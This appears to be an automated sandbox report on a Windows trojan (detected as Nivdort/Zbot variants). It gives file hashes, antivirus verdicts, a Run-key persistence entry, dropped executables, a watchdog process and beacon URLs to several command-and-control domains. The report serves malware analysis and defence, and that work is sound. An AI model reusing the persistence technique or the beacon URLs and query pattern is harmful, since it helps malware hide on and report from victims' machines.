Analysis Date: 2015-09-15 23:43:03
MD5: 741265a41325510d7776b9f9ddbe946e
SHA1: 77b4dce231faca91162e7a23f7bf233d7009c739

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: 2e46fc83f077d909fde6a30e107bcbd6  sha1: 0ce3464dfab4d84616e16f7fef2a3ca0b3f9f093  size: 300544
Section .rdata md5: 8703a922799b7b665f867be341ae8a58  sha1: 3ab42f98eb9eef3781aeee502a0cab81a65a9f42  size: 34816
Section .data  md5: 86d9cade827d6e7eacd4be38cb1b1b43  sha1: fff055bd079f3c290469f48a53081ee9c399991c  size: 105984
Timestamp: 2014-10-30 10:25:34
Packer: Microsoft Visual C++ ?.?
PEhash: eada0daa4997c018ce8191331073299128de2992
IMPhash: e923df0922261aab505b6087112d90ca
AV Rising: no_virus
AV Mcafee: Trojan-FEMT!741265A41325
AV Avira (antivir): BDS/Zegost.Gen4
AV Twister: Trojan.Agent.VNC.aanx.mg
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Eset (nod32): Win32/Agent.VNC
AV Grisoft (avg): Win32/Cryptor
AV Symantec: Downloader.Upatre!g15
AV Fortinet: W32/Agent.VNC!tr
AV BitDefender: Gen:Variant.Symmi.22722
AV K7: Trojan ( 004938ec1 )
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.BD
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV MalwareBytes: Trojan.Zbot.WHE
AV Authentium: W32/Wonton.B.gen!Eldorado
AV Frisk (f-prot): no_virus
AV Ikarus: Trojan.FBAccountLock
AV Emsisoft: Gen:Variant.Symmi.22722
AV Zillya!: no_virus
AV Kaspersky: Trojan.Win32.Generic
AV Trend Micro: TROJ_FORUCON.BMC
AV CAT (quickheal): Trojan.Dynamer.AC3
AV VirusBlokAda (vba32): no_virus
AV Padvish: no_virus
AV BullGuard: Gen:Variant.Symmi.22722
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV ClamAV: no_virus
AV Dr. Web: Trojan.DownLoader12.23558
AV F-Secure: Gen:Variant.Symmi.22722
AV CA (E-Trust Ino): Win32/Nivdort.XAYK!suspicious

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Now Browser Human Registrar Client Framework ➝ C:\Documents and Settings\Administrator\Application Data\jtmkajjcj\wcasjyjyntju.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\jtmkajjcj\wcasjyjyntju.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\jtmkajjcj\wcasjyjyntju.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\jtmkajjcj\wcasjyjyntju.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\jtmkajjcj\seajgptj.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\jtmkajjcj\wcasjyjyntju.kui
Creates File: \Device\Afd\Endpoint
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\jtmkajjcj\wcasjyjyntju.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\jtmkajjcj\wcasjyjyntju.exe"

Network Details:

HTTP GET: http://freshservice.net/index.php?email=fcoopms@rdslink.ro&method=post&len
User-Agent:
HTTP GET: http://beginservice.net/index.php?email=fcoopms@rdslink.ro&method=post&len
User-Agent:
HTTP GET: http://knownservice.net/index.php?email=fcoopms@rdslink.ro&method=post&len
User-Agent:
HTTP GET: http://beginriver.net/index.php?email=fcoopms@rdslink.ro&method=post&len
User-Agent:
HTTP GET: http://crowdservice.net/index.php?email=fcoopms@rdslink.ro&method=post&len
User-Agent:
HTTP GET: http://watermister.net/index.php?email=fcoopms@rdslink.ro&method=post&len
User-Agent:
HTTP GET: http://waterservice.net/index.php?email=fcoopms@rdslink.ro&method=post&len
User-Agent:
HTTP GET: http://womanservice.net/index.php?email=fcoopms@rdslink.ro&method=post&len
User-Agent:
HTTP GET: http://partyservice.net/index.php?email=fcoopms@rdslink.ro&method=post&len
User-Agent:
HTTP GET: http://freshshare.net/index.php?email=fcoopms@rdslink.ro&method=post&len
User-Agent:
HTTP GET: http://experienceshare.net/index.php?email=fcoopms@rdslink.ro&method=post&len
User-Agent:

Strings